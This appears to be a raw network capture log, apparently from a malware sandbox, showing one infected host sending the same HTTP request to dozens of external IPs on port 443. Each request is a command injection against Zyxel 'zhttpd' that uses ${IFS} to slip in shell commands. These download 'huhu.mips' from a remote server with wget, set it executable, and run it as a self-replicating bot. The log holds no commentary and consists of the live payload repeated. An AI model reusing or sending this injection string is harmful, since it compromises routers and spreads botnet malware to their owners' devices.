                                              Jan 29, 2024 07:03:54.093511105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5383192.168.2.144396647.211.172.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093560934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5384192.168.2.1446548184.219.166.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093591928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5385192.168.2.144309464.232.136.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093626022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5386192.168.2.143539657.148.202.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093647957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5387192.168.2.1441304160.210.139.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093696117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5388192.168.2.1449948184.108.38.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093733072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5389192.168.2.143828845.240.0.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093775988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5390192.168.2.1434654194.234.203.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093817949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5391192.168.2.144590887.169.51.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093854904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5392192.168.2.14568561.25.70.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093913078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5393192.168.2.1434254179.131.255.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093930960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5394192.168.2.143511053.131.251.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.093954086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5395192.168.2.145033675.208.78.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094005108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5396192.168.2.1453084174.171.201.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094037056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5397192.168.2.1444880150.147.147.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094072104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5398192.168.2.144571034.210.149.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094105959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5399192.168.2.1458984138.144.52.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094151974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5400192.168.2.1434036199.89.54.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094202042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5401192.168.2.145351483.212.50.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094237089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5402192.168.2.1434114152.173.183.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094247103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5403192.168.2.1436478172.6.204.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094301939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5404192.168.2.145754641.132.68.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094333887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5405192.168.2.1445066117.26.109.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094372034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5406192.168.2.1458162173.4.73.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094405890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5407192.168.2.1456922203.148.205.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094460964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5408192.168.2.144446234.129.101.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094476938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5409192.168.2.144683284.137.116.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094523907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5410192.168.2.1460402220.177.183.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094569921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5411192.168.2.1457956181.6.100.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094604969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5412192.168.2.1433356179.255.75.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094721079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5413192.168.2.1437134149.114.178.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094743967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5414192.168.2.14573124.85.135.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094772100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5415192.168.2.143358667.13.17.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094806910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5416192.168.2.144260844.156.217.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094846010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5417192.168.2.143306634.254.194.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094890118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5418192.168.2.1445840222.121.128.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094916105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5419192.168.2.145157246.182.90.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094954967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5420192.168.2.1455170109.5.207.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.094985962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5421192.168.2.1455154115.210.80.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095016956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5422192.168.2.1441836117.60.62.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095083952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5423192.168.2.145193225.72.194.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095092058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5424192.168.2.1452648135.155.142.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095124960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5425192.168.2.1441504221.23.188.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095134974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5426192.168.2.1455194162.195.98.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095199108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5427192.168.2.1441598183.29.0.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095243931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5428192.168.2.14379405.174.197.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095284939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5429192.168.2.1455816144.0.99.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095309973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5430192.168.2.145668882.142.233.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095345974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5431192.168.2.1449672184.134.60.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095390081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5432192.168.2.1460520194.142.118.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095406055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5433192.168.2.1453744192.211.128.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095453978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5434192.168.2.144043852.233.182.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095487118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5435192.168.2.1445810207.168.115.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095524073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5436192.168.2.1441708169.5.234.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095556974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5437192.168.2.145173691.255.142.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095590115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5438192.168.2.143798627.125.55.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095649958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5439192.168.2.143934461.241.198.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095678091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5440192.168.2.1449846112.58.77.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095715046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5441192.168.2.145277086.233.192.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095741987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5442192.168.2.145954487.98.28.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095796108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5443192.168.2.1447136149.241.186.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095833063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5444192.168.2.1434226163.58.77.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095875978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5445192.168.2.1448386200.93.180.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:54.095918894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5446192.168.2.1451690220.95.221.110443
                                              TimestampBytes transferredDirectionData
